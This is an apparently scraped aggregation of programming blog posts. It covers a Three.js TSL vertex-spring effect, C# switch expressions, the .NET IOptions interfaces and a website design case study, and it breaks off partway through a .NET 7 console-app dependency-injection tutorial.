    To do that, we use the step function — it acts like a threshold, and lets us apply the effect only when the distance is below a defined value.

    Finally, we use the vertex normal as a direction to push it outward.
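    The step function follows GLSL semantics: step(edge, x) returns 0.0 when x < edge and 1.0 otherwise. A plain-JavaScript sketch of what step(distance, 0.5) computes per vertex:

    ```javascript
    // Plain-JavaScript equivalent of the GLSL/TSL step() used below:
    // step(edge, x) returns 0.0 when x < edge, and 1.0 otherwise.
    function step(edge, x) {
      return x < edge ? 0.0 : 1.0;
    }

    // The shader calls step(distance, 0.5): here "edge" is the pointer
    // distance and "x" is the fixed radius, so the result is 1.0 only
    // while the vertex sits within 0.5 units of the pointer.
    const inside  = step(0.3, 0.5); // distance 0.3 → 1.0 (deform)
    const outside = step(0.8, 0.5); // distance 0.8 → 0.0 (leave alone)
    ```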

    const compute_update = Fn(() => {
    
        // Original position of the vertex — also its resting position
        const base_position = initial_position.element(instanceIndex);
    
        // The vertex normal tells us which direction to push
        const normal = normal_at.element(instanceIndex);
    
        // Current position of the vertex — we’ll update this every frame
        const current_position = position_storage_at.element(instanceIndex);
    
        // Calculate distance between the pointer and the base position of the vertex
        const distance = length(u_input_pos.sub(base_position));
    
        // Limit the effect's range: it only applies if distance is less than 0.5
        const pointer_influence = step(distance, 0.5).mul(1.0);
    
        // Compute the new displaced position along the normal.
        // Where pointer_influence is 0, there’ll be no deformation.
        const disorted_pos = base_position.add(normal.mul(pointer_influence));
    
        // Assign the new position to update the vertex
        current_position.assign(disorted_pos);
    
    })().compute(count);
    

    To make this work, we’re missing two key steps: we need to assign the buffer with the modified positions to the material, and we need to make sure the renderer runs the compute function on every frame inside the animation loop.

    // Assign the buffer with the modified positions to the material
    mesh.material.positionNode = position_storage_at.toAttribute();
    
    // Animation loop
    function animate() {
    	// Run the compute function
    	renderer.computeAsync(compute_update);
    
    	// Render the scene
    	renderer.renderAsync(scene, camera);
    }
    
    // Start the loop — setAnimationLoop also works with WebGPURenderer
    renderer.setAnimationLoop(animate);

    Right now the function doesn’t produce anything too exciting — the geometry moves around in a kinda clunky way. We’re about to bring in springs, and things will get much better.

    // Spring — how much force we apply to reach the target value
    velocity += (target_value - current_value) * spring;
    
    // Friction controls the damping, so the movement doesn’t oscillate endlessly
    velocity *= friction;
    
    current_value += velocity;
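    Outside the shader, those three lines can be sanity-checked in plain JavaScript — the value converges toward the target while friction damps the oscillation (the spring and friction constants here are just illustrative defaults):

    ```javascript
    // Minimal spring integrator: same update rule as the pseudocode above.
    function springStep(state, target, spring = 0.05, friction = 0.9) {
      state.velocity += (target - state.value) * spring; // pull toward target
      state.velocity *= friction;                        // damp the motion
      state.value += state.velocity;
      return state;
    }

    const state = { value: 0, velocity: 0 };
    for (let i = 0; i < 300; i++) springStep(state, 1.0);
    // After enough steps, state.value has settled very close to 1.0
    ```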

    But before that, we need to store one more value per vertex, the velocity, so let’s create another storage buffer.

    const position_storage_at = storage(new THREE.StorageBufferAttribute(count, 3), "vec3", count);
    
    // New buffer for velocity
    const velocity_storage_at = storage(new THREE.StorageBufferAttribute(count, 3), "vec3", count);
    
    const compute_init = Fn(() => {
    
        position_storage_at.element(instanceIndex).assign(initial_position.element(instanceIndex));
        
        // We initialize it too
        velocity_storage_at.element(instanceIndex).assign(vec3(0.0, 0.0, 0.0));
    
    })().compute(count);

    We’ll also add two uniforms: spring and friction.

    const u_spring = uniform(0.05);
    const u_friction = uniform(0.9);

    Now we’ve implemented the springs in the update:

    const compute_update = Fn(() => {
    
        const base_position = initial_position.element(instanceIndex);
        const current_position = position_storage_at.element(instanceIndex);
    
        // Get current velocity
        const current_velocity = velocity_storage_at.element(instanceIndex);
    
        const normal = normal_at.element(instanceIndex);
    
        const   distance =  length(u_input_pos.sub(base_position));
        const   pointer_influence = step(distance,0.5).mul(1.5);
    
        const disorted_pos = base_position.add(normal.mul(pointer_influence));
        disorted_pos.assign((mix(base_position, disorted_pos, u_input_pos_press)));
      
        // Spring implementation
        // velocity += (target_value - current_value) * spring;
        current_velocity.addAssign(disorted_pos.sub(current_position).mul(u_spring));
        // velocity *= friction;
        current_velocity.assign(current_velocity.mul(u_friction));
        // value += velocity
        current_position.addAssign(current_velocity);
    
    
    })().compute(count);

    Now we’ve got everything we need — time to start fine-tuning.

    We’re going to add two things. First, we’ll use the TSL function mx_noise_vec3 to generate some noise for each vertex. That way, we can tweak the direction a bit so things don’t feel so stiff.

    We’re also going to rotate the vertices using another TSL function — surprise, it’s called rotate.

    Here’s what our updated compute_update function looks like:

    const compute_update = Fn(() => {
    
        const base_position = initial_position.element(instanceIndex);
        const current_position = position_storage_at.element(instanceIndex);
        const current_velocity = velocity_storage_at.element(instanceIndex);
    
        const normal = normal_at.element(instanceIndex);
    
        // NEW: Add noise so the direction in which the vertices "explode" isn’t too perfectly aligned with the normal
        const noise = mx_noise_vec3(current_position.mul(0.5).add(vec3(0.0, time, 0.0)), 1.0).mul(u_noise_amp);
    
        const distance = length(u_input_pos.sub(base_position));
        const pointer_influence = step(distance, 0.5).mul(1.5);
    
        const disorted_pos = base_position.add(noise.mul(normal.mul(pointer_influence)));
    
        // NEW: Rotate the vertices to give the animation a more chaotic feel
        disorted_pos.assign(rotate(disorted_pos, vec3(normal.mul(distance)).mul(pointer_influence)));
    
        disorted_pos.assign(mix(base_position, disorted_pos, u_input_pos_press));
    
        current_velocity.addAssign(disorted_pos.sub(current_position).mul(u_spring));
        current_position.addAssign(current_velocity);
        current_velocity.assign(current_velocity.mul(u_friction));
    
    })().compute(count);
    

    Now that the motion feels right, it’s time to tweak the material colors a bit and add some post-processing to the scene.

    We’re going to work on the emissive color — meaning it won’t be affected by lights, and it’ll always look bright and explosive. Especially once we throw some bloom on top. (Yes, bloom everything.)

    We’ll start from a base color (whichever you like), passed in as a uniform. To make sure each vertex gets a slightly different color, we’ll offset its hue a bit using values from the buffers — in this case, the velocity buffer.

    The hue function takes a color and a value to shift its hue, kind of like how offsetHSL works in THREE.Color.

    // Base emissive color
    const emissive_color = color(new THREE.Color("#0000ff"));
    
    const vel_at = velocity_storage_at.toAttribute();
    const hue_rotated = vel_at.mul(Math.PI*10.0);
    
    // Multiply by the length of the velocity buffer — this means the more movement,
    // the more the vertex color will shift
    const emission_factor = length(vel_at).mul(10.0);
    
    // Assign the color to the emissive node and boost it as much as you want
    mesh.material.emissiveNode = hue(emissive_color, hue_rotated).mul(emission_factor).mul(5.0);

    Finally, let’s change the scene background color and add some fog:

    scene.fog = new THREE.Fog(new THREE.Color("#41444c"),0.0,8.5);
    scene.background = scene.fog.color;

    Now, let’s spice up the scene with a bit of post-processing — one of those things that got way easier to implement thanks to TSL.

    We’re going to include three effects: ambient occlusion, bloom, and noise. I always like adding some noise to what I do — it helps break up the flatness of the pixels a bit.

    I won’t go too deep into this part — I grabbed the AO setup from the Three.js examples.

    const   composer = new THREE.PostProcessing(renderer);
    const   scene_pass = pass(scene,camera);
    
    scene_pass.setMRT(mrt({
        output:output,
        normal:normalView
    }));
    
    const   scene_color = scene_pass.getTextureNode("output");
    const   scene_depth = scene_pass.getTextureNode("depth");
    const   scene_normal = scene_pass.getTextureNode("normal");
    
    const ao_pass = ao( scene_depth, scene_normal, camera);
    ao_pass.resolutionScale = 1.0;
    
    const   ao_denoise = denoise(ao_pass.getTextureNode(), scene_depth, scene_normal, camera ).mul(scene_color);
    const   bloom_pass = bloom(ao_denoise,0.3,0.2,0.1);
    const   post_noise = (mx_noise_float(vec3(uv(),time.mul(0.1)).mul(sizes.width),0.03)).mul(1.0);
    
    composer.outputNode = ao_denoise.add(bloom_pass).add(post_noise);

    Alright, that’s it amigas — thanks so much for reading, and I hope it was useful!




  • Advanced Switch Expressions and Switch Statements using filters | Code4IT



    We all use switch statements in our code. Do you use them at their full potential?


    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    We all use switch statements in our code: they are a helpful way to run different code paths based on a check on a variable.

    In this short article, we’re gonna learn different ways to write switch blocks, and some nice tricks to create clean and easy-to-read filters on such statements.

    For the sake of this example, we will use a dummy hierarchy of types: a base User record with three subtypes: Player, Gamer, and Dancer.

    public abstract record User(int Age);
    
    public record Player(int Age, string Sport) : User(Age);
    
    public record Gamer(int Age, string Console) : User(Age);
    
    public record Dancer(int Age, string Dance) : User(Age);
    

    Let’s see different usages of switch statements and switch expressions.

    Switch statements

    Switch statements are those with the standard switch (something) block. They allow for different execution paths, acting as a chain of if-else if blocks.

    They can be used to return a value, but it’s not mandatory: you can simply use switch statements to execute code that does not return any value.

    Switch statements with checks on the type

    The simplest example is a plain check on the type.

    User user = new Gamer(30, "Nintendo Switch");
    
    string message = "";
    
    switch (user)
    {
        case Gamer:
        {
            message = "I'm a gamer";
            break;
        }
        case Player:
        {
            message = "I'm a player";
            break;
        }
        default:
        {
            message = "My type is not handled!";
            break;
        }
    }
    
    Console.WriteLine(message); // I'm a gamer
    

    Here we execute a different path based on the value the user variable has at runtime.

    We can also have an automatic casting to the actual type, and then use the runtime data within the case block:

    User user = new Gamer(30, "Nintendo Switch");
    
    string message = "";
    
    switch (user)
    {
        case Gamer g:
        {
            message = "I'm a gamer, and I have a " + g.Console;
            break;
        }
        case Player:
        {
            message = "I'm a player";
            break;
        }
        default:
        {
            message = "My type is not handled!";
            break;
        }
    }
    
    Console.WriteLine(message); //I'm a gamer, and I have a Nintendo Switch
    

    As you can see, since user is a Gamer, within the related branch we cast the user to Gamer in a variable named g, so that we can use its public properties and methods.

    Filtering using the WHEN keyword

    We can add additional filters on the actual value of the variable by using the when clause:

    User user = new Gamer(3, "Nintendo");
    
    string message = "";
    
    switch (user)
    {
        case Gamer g when g.Age < 10:
        {
            message = "I'm a gamer, but too young";
            break;
        }
        case Gamer g:
        {
            message = "I'm a gamer, and I have a " + g.Console;
            break;
        }
        case Player:
        {
            message = "I'm a player";
            break;
        }
        default:
        {
            message = "My type is not handled!";
            break;
        }
    }
    
    Console.WriteLine(message); // I'm a gamer, but too young
    

    Here we have the when g.Age < 10 filter applied to the Gamer g variable.

    Clearly, if we set the age to 30, we will see I’m a gamer, and I have a Nintendo.

    Switch Expression

    Switch expressions act like Switch Statements, but they return a value that can be assigned to a variable or, in general, used immediately.

    They look like a lightweight, inline version of Switch Statements, and have a slightly different syntax.

    To reach the same result we saw before, we can write:

    User user = new Gamer(30, "Nintendo Switch");
    
    string message = user switch
    {
        Gamer g => "I'm a gamer, and I have a " + g.Console,
        Player => "I'm a player",
        _ => "My type is not handled!"
    };
    
    Console.WriteLine(message);
    

    By looking at the syntax, we can notice a few things:

    • instead of having switch(variable_name){}, we now have variable_name switch {};
    • we use the arrow notation => to define the cases;
    • we don’t have the default keyword, but we use the discard value _.

    When keyword vs Property Pattern in Switch Expressions

    Similarly, we can use the when keyword to define better filters on the cases.

    string message = user switch
    {
        Gamer gg when gg.Age < 10 => "I'm a gamer, but too young",
        Gamer g => "I'm a gamer, and I have a " + g.Console,
        Player => "I'm a player",
        _ => "My type is not handled!"
    };
    

    Finally, you can use a slightly different syntax to achieve the same result: instead of writing when gg.Age < 10, you can write Gamer { Age: < 10 }. This is called the Property Pattern.

    string message = user switch
    {
        Gamer { Age: < 10 } => "I'm a gamer, but too young",
        Gamer g => "I'm a gamer, and I have a " + g.Console,
        Player => "I'm a player",
        _ => "My type is not handled!"
    };
    

    Further readings

    We actually just scratched the surface of all the functionalities provided by the C# language.

    First of all, you can learn more about how to use Relational Patterns in a switch expression.

    To have a taste of it, here’s a short example:

    string Classify(double measurement) => measurement switch
    {
        < -4.0 => "Too low",
        > 10.0 => "Too high",
        double.NaN => "Unknown",
        _ => "Acceptable",
    };
    

    but you can read more here:

    🔗 Relational patterns | Microsoft Docs

    This article first appeared on Code4IT 🐧

    There are also more ways to handle Switch Statements. To learn about more complex examples, here’s the documentation:

    🔗 The switch statement | Microsoft Docs

    Finally, in those examples, we used records. As you saw, I marked the User type as abstract.

    Do you want to learn more about Records?

    🔗 8 things about Records in C# you probably didn’t know | Code4IT

    Wrapping up

    Learning about tools and approaches is useful, but you should also stay up-to-date with language features.

    Switch blocks had a great evolution over time, making our code more concise and distraction-free.

    I hope you enjoyed this article! Let’s keep in touch on Twitter or LinkedIn! 🤜🤛

    Happy coding!

    🐧






  • Understanding IOptions, IOptionsMonitor, and IOptionsSnapshot in .NET 7 | Code4IT



    There are several ways to handle configurations in a .NET Application. In this article, we’re going to learn how to use IOptions<T>, IOptionsSnapshot<T>, and IOptionsMonitor<T>



    When dealing with configurations in a .NET application, we can choose different strategies. For example, you can simply inject an IConfiguration instance in your constructor, and retrieve every value by name.

    Or you can get the best out of Strongly Typed Configurations – you won’t have to care about casting those values manually because everything is already done for you by .NET.

    In this article, we are going to learn about IOptions, IOptionsSnapshot, and IOptionsMonitor. They look similar, but there are some key differences that you need to understand to pick the right one.

    For the sake of this article, I’ve created a dummy .NET API that exposes only one endpoint.

    In my appsettings.json file, I added a node:

    {
      "MyConfig": {
        "Name": "Davide"
      }
    }
    

    that will be mapped to a POCO class:

    public class GeneralConfig
    {
        public string Name { get; set; }
    }
    

    To add it to the API project, we can add this line to the Program.cs file:

    builder.Services.Configure<GeneralConfig>(builder.Configuration.GetSection("MyConfig"));
    

    As you can see, it takes the content with the name “MyConfig” and maps it to an object of type GeneralConfig.

    To test such types, I’ve created a set of dummy API Controllers. Each Controller exposes one single method, Get(), that reads the value from the configuration and returns it in an object.

    We are going to inject IOptions, IOptionsSnapshot, and IOptionsMonitor into the constructor of the related Controllers so that we can try the different approaches.

    IOptions: Simple, Singleton, doesn’t support config reloads

    IOptions<T> is the simplest way to inject such configurations. We can inject it into our constructors and access the actual value using the Value property:

    private readonly GeneralConfig _config;
    
    public TestingController(IOptions<GeneralConfig> config)
    {
        _config = config.Value;
    }
    

    Now we have direct access to the GeneralConfig object, with the values populated as we defined in the appsettings.json file.

    There are a few things to consider when using IOptions<T>:

    • This service is injected as a Singleton instance: the whole application uses the same instance, and it is valid throughout the whole application lifetime.
    • All the configurations are read at startup time: even if you update the appsettings file while the application is running, you won’t see the values updated.

    Some people prefer to store the IOptions<T> instance as a private field, and access the value when needed using the Value property, like this:

    private readonly IOptions<GeneralConfig> _config;
    private int updates = 0;
    
    public TestingController(IOptions<GeneralConfig> config)
    {
        _config = config;
    }
    
    [HttpGet]
    public ActionResult<Result> Get()
    {
        var name = _config.Value.Name;
        return new Result
        {
            MyName = name,
            Updates = updates
        };
    }
    

    It works, but it’s useless: since IOptions<T> is a Singleton, we don’t need to access the Value property every time. It won’t change over time, and accessing it every single time is a useless operation. We can use the former approach: it’s easier to write and (just a bit) more performant.

    One more thing.
    When writing Unit Tests, we can inject an IOptions<T> in the system under test using a static method, Options.Create<T>, and pass it an instance of the required type.

    [SetUp]
    public void Setup()
    {
        var config = new GeneralConfig { Name = "Test" };
    
        var options = Options.Create(config);
    
        _sut = new TestingController(options);
    }
    

    Demo: the configuration does not change at runtime

    Below you can find a GIF that shows that the configurations do not change when the application is running.

    With IOptions the configuration does not change at runtime

    As you can see, I performed the following steps:

    1. start the application
    2. call the /TestingIOptions endpoint: it returns the name Davide
    3. now I update the content of the appsettings.json file, setting the name to Davide Bellone.
    4. when I call again the same endpoint, I don’t see the updated value.

    IOptionsSnapshot: Scoped, less-performant, supports config reload

    Similar to IOptions<T> we have IOptionsSnapshot<T>. They work similarly, but there is a huge difference: IOptionsSnapshot<T> is recomputed at every request.

    public TestingController(IOptionsSnapshot<GeneralConfig> config)
    {
        _config = config.Value;
    }
    

    With IOptionsSnapshot<T> you always have the most updated values: this service is injected with a Scoped lifetime, meaning that the values are read from configuration at every HTTP request. This also means that you can update the settings values while the application is running, and you’ll be able to see the updated results.

    Since .NET rebuilds the configurations at every HTTP call, there is a slight performance overhead. So, if not necessary, always use IOptions<T>.

    There is no way to test an IOptionsSnapshot<T> as we did with IOptions<T>, so you have to use stubs or mocks (maybe with Moq or NSubstitute 🔗).

    Demo: the configuration changes while the application is running

    Look at the GIF below: here I run the application and call the /TestingIOptionsSnapshot endpoint.

    With IOptionsSnapshot the configuration changes while the application is running

    I performed the following steps:

    1. run the application
    2. call the /TestingIOptionsSnapshot endpoint. The returned value is the same on the appsettings.json file: Davide Bellone.
    3. I then update the value on the configuration file
    4. when calling again /TestingIOptionsSnapshot, I can see that the returned value reflects the new value in the appsettings file.

    IOptionsMonitor: Complex, Singleton, supports config reload

    Finally, the last one of the trio: IOptionsMonitor<T>.

    Using IOptionsMonitor<T> you can always access the most updated values from the appsettings.json file.

    We also have a callback event that is triggered every time the configuration file is updated.

    It’s injected as a Singleton service, so the same instance is shared across the whole application lifetime.

    There are two main differences with IOptions<T>:

    1. the name of the property that stores the config value is CurrentValue instead of Value;
    2. there is a callback that is called every time you update the settings file: OnChange(Action<TOptions, string?> listener). You can use it to perform operations that must be triggered every time the configuration changes.

    Note: OnChange returns an object that implements IDisposable that you need to dispose. Otherwise, as Chris Elbert noticed (ps: follow him on Twitter!), the instance of the class that uses IOptionsMonitor<T> will never be disposed.
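    In practice, this means keeping the handle returned by OnChange and releasing it when the consuming class goes away. A sketch (the ConfigWatcher class is made up for illustration; GeneralConfig comes from this article's demo):

    ```csharp
    using Microsoft.Extensions.Options;

    public class ConfigWatcher : IDisposable
    {
        private readonly IDisposable? _subscription;

        public ConfigWatcher(IOptionsMonitor<GeneralConfig> monitor)
        {
            // Keep the IDisposable returned by OnChange...
            _subscription = monitor.OnChange((opts, name) =>
                Console.WriteLine($"Config changed: {opts.Name}"));
        }

        // ...and dispose it, otherwise the listener (and this class) stays alive
        public void Dispose() => _subscription?.Dispose();
    }
    ```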

    Again, there is no way to test an IOptionsMonitor<T> as we did with IOptions<T>. So you should rely on stubs and mocks (again, maybe with Moq or NSubstitute 🔗).

    Demo: the configuration changes, and the callback is called

    In the GIF below I demonstrate the usage of IOptionsMonitor.

    I created an API controller that listens to changes in the configuration, updates a static counter, and returns the final result from the API:

    public class TestingIOptionsMonitorController : ControllerBase
    {
        private static int updates = 0;
        private readonly GeneralConfig _config;
    
        public TestingIOptionsMonitorController(IOptionsMonitor<GeneralConfig> config)
        {
            _config = config.CurrentValue;
            config.OnChange((_, _) => updates++);
        }
    
        [HttpGet]
        public ActionResult<Result> Get() => new Result
        {
            MyName = _config.Name,
            Updates = updates
        };
    }
    

    By running it and modifying the config content while the application is up and running, you can see the full usage of IOptionsMonitor<T>:

    With IOptionsMonitor the configuration changes, the callback is called

    As you can see, I performed these steps:

    1. I ran the application;
    2. I called the /TestingIOptionsMonitor endpoint: the MyName field is read from config, and Updates is 0;
    3. I then updated and saved the config file. In the background, the OnChange callback is fired, and the Updates value is updated;

    Oddly, the callback is called more times than expected. I updated the file only twice, but the counter is set to 6. That’s weird behavior. If you know why it happens, drop a message below 📩
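    A likely explanation is that the underlying file watcher raises several change notifications for a single save: many editors write a file in more than one step. If the duplicate calls are a problem, a small debounce is a common workaround. A sketch (the Debouncer class is made up for illustration):

    ```csharp
    using System;

    // Collapses bursts of notifications into one, using a simple time window
    public class Debouncer
    {
        private readonly TimeSpan _window;
        private DateTime _last = DateTime.MinValue;

        public Debouncer(TimeSpan window) => _window = window;

        public bool ShouldRun()
        {
            var now = DateTime.UtcNow;
            if (now - _last < _window)
                return false; // too soon after the previous notification: skip

            _last = now;
            return true;
        }
    }
    ```

    In the controller above, the callback would then become something like `config.OnChange((_, _) => { if (debouncer.ShouldRun()) updates++; });`.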

    IOptions vs IOptionsSnapshot vs IOptionsMonitor in .NET

    We’ve seen a short introduction to IOptions, IOptionsSnapshot, and IOptionsMonitor.

    There are some differences, of course. Here’s a table with a recap of what we learned from this article.

    Type | DI Lifetime | Best way to inject in unit tests | Allows live reload | Has callback function
    IOptions<T> | Singleton | Options.Create<T> | ❌ | ❌
    IOptionsSnapshot<T> | Scoped | Stub / Mock | 🟢 | ❌
    IOptionsMonitor<T> | Singleton | Stub / Mock | 🟢 | 🟢

    There’s actually more: for example, with IOptionsSnapshot and IOptionsMonitor you can use named options, so that you can inject more instances of the same type that refer to different nodes in the JSON file.

    But that will be the topic for a future article, so stay tuned 😎

    Further readings

    There is a lot more about how to inject configurations.

    For sure, one of the best resources is the official documentation:

    🔗 Options pattern in ASP.NET Core | Microsoft docs

    I insisted on explaining that IOptions and IOptionsMonitor are Singleton, while IOptionsSnapshot is Scoped.
    If you don’t know what they mean, here’s a short but thorough explanation:

    🔗 Dependency Injection lifetimes in .NET | Code4IT

    In particular, I want you to focus on the Bonus tip, where I explain the problems of having Transient or Scoped services injected into a Singleton service:

    🔗Bonus tip: Transient dependency inside a Singleton | Code4IT

    This article first appeared on Code4IT 🐧

    In this article, I stored my configurations in an appsettings.json file. There are more ways to set configuration values – for example, Environment Variables and launchSettings.json.

    🔗 3 (and more) ways to set configuration values in .NET | Code4IT

    Wrapping up

    In this article, we learned how to use IOptions<T>, IOptionsSnapshot<T>, and IOptionsMonitor<T> in a .NET 7 application.

    There are many other ways to handle configurations: for instance, you can simply inject the whole object as a singleton, or use IConfiguration to get single values.

    When would you choose an approach instead of another? Drop a comment below! 📩

    I hope you enjoyed this article! Let’s keep in touch on Twitter or LinkedIn! 🤜🤛

    Happy coding!

    🐧





    Source link

  • Beyond the Corporate Mold: How 21 TSI Sets the Future of Sports in Motion

    Beyond the Corporate Mold: How 21 TSI Sets the Future of Sports in Motion



    21 TSI isn’t your typical sports holding company. Overseeing a portfolio of brands in the sports equipment space, the team set out to break from the mold of the standard corporate website. Instead, they envisioned a digital experience that would reflect their DNA—where innovation, design, and technology converge into a rich, immersive journey.

    The result is a site that goes beyond static content, inviting users to explore through motion, interactivity, and meticulously crafted visuals. Developed through a close collaboration between type8 Studio and DEPARTMENT Maison de Création, the project pushes creative and technical boundaries to deliver a seamless, engaging experience.

    Concept & Art Direction

    The creative direction led by Paul Barbin played a crucial role in shaping the website’s identity. The design embraces a minimalist yet bold aesthetic—strictly monochromatic, anchored by a precise and structured typographic system. The layout is intentionally clean, but the experience stays dynamic thanks to well-orchestrated WebGL animations and subtle interactions.

    Grid & Style

    The definition of the grid played a fundamental role in structuring and clarifying the brand’s message. More than just a layout tool, the grid became a strategic framework—guiding content organization, enhancing readability, and ensuring visual consistency across all touchpoints.

    We chose an approach inspired by the Swiss style, also known as the International Typographic Style, celebrated for its clarity, precision, and restraint. This choice reflects our commitment to clear, direct, and functional communication, with a strong focus on user experience. The grid allows each message to be delivered with intention, striking a subtle balance between aesthetics and efficiency.

    A unique aspect of the project was the integration of AI-generated imagery. These visuals were thoughtfully curated and refined to align with the brand’s futuristic and enigmatic identity, further reinforcing the immersive nature of the website.

    Interaction & Motion Design

    The experience of 21 TSI is deeply rooted in movement. The site feels alive—constantly shifting and morphing in response to user interactions. Every detail works together to evoke a sense of fluidity:

    • WebGL animations add depth and dimension, making the site feel tactile and immersive.
    • Morphing transitions enable smooth navigation between sections, avoiding abrupt visual breaks.
    • Cursor distortion effects introduce a subtle layer of interactivity, letting users influence their journey through motion.
    • Scroll-based animations strike a careful balance between engagement and clarity, ensuring motion enhances the experience without overwhelming it.

    This dynamic approach creates a browsing experience that feels both organic and responsive—keeping users engaged without ever overwhelming them.

    Technical Implementation & Motion Design

    For this project, we chose a technology stack designed to deliver high performance and smooth interactions, all while maintaining the flexibility needed for creative exploration:

    • OGL: A lightweight alternative to Three.js, used for WebGL-powered animations and visual effects.
    • Anime.js: Handles motion design elements and precise animation timing.
    • Locomotive Scroll: Enables smooth, controlled scroll behavior throughout the site.
    • Eleventy (11ty): A static site generator that ensures fast load times and efficient content management.
    • Netlify: Provides seamless deployment and version control, keeping the development workflow agile.

    One of the key technical challenges was optimizing performance across devices while preserving the same fluid motion experience. Carefully balancing GPU-intensive WebGL elements with lightweight animations made seamless performance possible.

    Challenges & Solutions

    One of the primary challenges was ensuring that the high level of interactivity didn’t compromise usability. The team worked extensively to refine transitions so they felt natural, while keeping navigation intuitive. Balancing visual complexity with performance was equally critical—avoiding unnecessary elements while preserving a rich, engaging experience.

    Another challenge was the use of AI-generated visuals. While they introduced unique artistic possibilities, these assets required careful curation and refinement to align with the creative vision. Ensuring coherence between the AI-generated content and the designed elements was a meticulous process.

    Conclusion

    The 21 TSI website is a deep exploration of digital storytelling through design and interactivity. It captures the intersection of technology and aesthetics, offering an experience that goes well beyond a traditional corporate presence.

    The project was recognized with multiple awards, including Website of the Day on CSS Design Awards, FWA of the Day, and Awwwards, reinforcing its impact in the digital design space.

    This collaboration between type8 Studio and Paul Barbin of DEPARTMENT Maison de Création showcases how thoughtful design, innovative technology, and a strong artistic vision can come together to craft a truly immersive web experience.



    Source link

  • How to add Dependency Injection, Configurations, and Logging in a .NET 7 Console Application | Code4IT

    How to add Dependency Injection, Configurations, and Logging in a .NET 7 Console Application | Code4IT


    By default, you cannot use Dependency Injection, custom logging, and configurations from settings in a Console Application. Unless you create a custom Host!

    Table of Contents

    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    Sometimes, you just want to create a console application to run a complex script. Just because it is a “simple” console application, it doesn’t mean that you should not use best practices, such as using Dependency Injection.

    Also, you might want to test the code: Dependency Injection allows you to test the behavior of a class without having a strict dependency on the referenced concrete classes: you can use stubs and mocks, instead.

    In this article, we’re going to learn how to add Dependency Injection in a .NET 7 console application. The same approach can be used for other versions of .NET. We will also add logging, using Serilog, and configurations coming from an appsettings.json file.

    We’re going to start small, with the basic parts, and gradually move on to more complex scenarios. We’re gonna create a simple, silly console application: we will inject a bunch of services, and print a message on the console.

    We have a root class:

    public class NumberWorker
    {
        private readonly INumberService _service;
    
        public NumberWorker(INumberService service) => _service = service;
    
        public void PrintNumber()
        {
            var number = _service.GetPositiveNumber();
            Console.WriteLine($"My wonderful number is {number}");
        }
    }
    

    that injects an INumberService, implemented by NumberService:

    public interface INumberService
    {
        int GetPositiveNumber();
    }
    
    public class NumberService : INumberService
    {
        private readonly INumberRepository _repo;
    
        public NumberService(INumberRepository repo) => _repo = repo;
    
        public int GetPositiveNumber()
        {
            int number = _repo.GetNumber();
            return Math.Abs(number);
        }
    }
    

    which, in turn, uses an INumberRepository implemented by NumberRepository:

    public interface INumberRepository
    {
        int GetNumber();
    }
    
    public class NumberRepository : INumberRepository
    {
        public int GetNumber()
        {
            return -42;
        }
    }
    

    The console application will create a new instance of NumberWorker and call the PrintNumber method.

    Now, we have to build the dependency tree and inject such services.

    How to create an IHost to use a host for a Console Application

    The first step to take is to install some NuGet packages that will allow us to add a custom IHost container so that we can add Dependency Injection and all the customization we usually add in projects that have a StartUp (or a Program) class, such as .NET APIs.

    We need to install two NuGet packages, Microsoft.Extensions.Hosting.Abstractions and Microsoft.Extensions.Hosting, which will be used to create a new IHost that builds the dependency tree.

    By opening your csproj file, you should be able to see something like this:

    <ItemGroup>
        <PackageReference Include="Microsoft.Extensions.Hosting" Version="7.0.1" />
        <PackageReference Include="Microsoft.Extensions.Hosting.Abstractions" Version="7.0.0" />
    </ItemGroup>
    

    Now we are ready to go! First, add the following using statements:

    using Microsoft.Extensions.DependencyInjection;
    using Microsoft.Extensions.Hosting;
    

    and then, within the Program class, add this method:

    private static IHost CreateHost() =>
      Host.CreateDefaultBuilder()
          .ConfigureServices((context, services) =>
          {
              services.AddSingleton<INumberRepository, NumberRepository>();
              services.AddSingleton<INumberService, NumberService>();
          })
          .Build();
    

    Host.CreateDefaultBuilder() creates the default IHostBuilder – similar to the IWebHostBuilder, but without any reference to web components.

    Then we add all the dependencies, using services.AddSingleton<T, K>. Notice that it's not necessary to add services.AddSingleton<NumberWorker>: when we use the concrete instance, the dependency tree will be resolved, without needing to register the root itself.

    Finally, once we have everything in place, we call Build() to create a new instance of IHost.

    Now, we just have to run it!

    In the Main method, create the IHost instance by calling CreateHost(). Then, by using the ActivatorUtilities class (coming from the Microsoft.Extensions.DependencyInjection namespace), create a new instance of NumberWorker, so that you can call PrintNumber():

    private static void Main(string[] args)
    {
      IHost host = CreateHost();
      NumberWorker worker = ActivatorUtilities.CreateInstance<NumberWorker>(host.Services);
      worker.PrintNumber();
    }
    

    Now you are ready to run the application, and see the message on the console:

    Basic result on Console

    Read configurations from appsettings.json in a Console Application

    We want to make our system configurable and place our configurations in an appsettings.json file.

    As we saw in a recent article 🔗, we can use IOptions<T> to inject configurations in the constructor. For the sake of this article, I’m gonna use a POCO class, NumberConfig, that is mapped to a configuration section and injected into the classes.

    public class NumberConfig
    {
        public int DefaultNumber { get; set; }
    }
    

    Now we need to manually create an appsettings.json file within the project folder, and add a new section that will hold the values of the configuration:

    {
      "Number": {
        "DefaultNumber": -899
      }
    }
    

    and now we can add the configuration binding in our CreateHost() method, within the ConfigureServices section:

    services.Configure<NumberConfig>(context.Configuration.GetSection("Number"));
    

    Finally, we can update the NumberRepository to accept the configurations in input and use them to return the value:

    public class NumberRepository : INumberRepository
    {
        private readonly NumberConfig _config;
    
        public NumberRepository(IOptions<NumberConfig> options) => _config = options.Value;
    
        public int GetNumber() => _config.DefaultNumber;
    }
    

    Run the project to admire the result, and… BOOM! It will not work! You should see the message “My wonderful number is 0”, even though the number we set on the config file is -899.

    This happens because we must include the appsettings.json file in the result of the compilation. Right-click on that file, select the Properties menu, and set the “Copy to Output Directory” to “Copy always”:

    Copy always the appsettings file to the Output Directory
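    If you prefer keeping this setting in source control rather than in the IDE dialog, the same effect can be obtained by editing the csproj directly:

    ```xml
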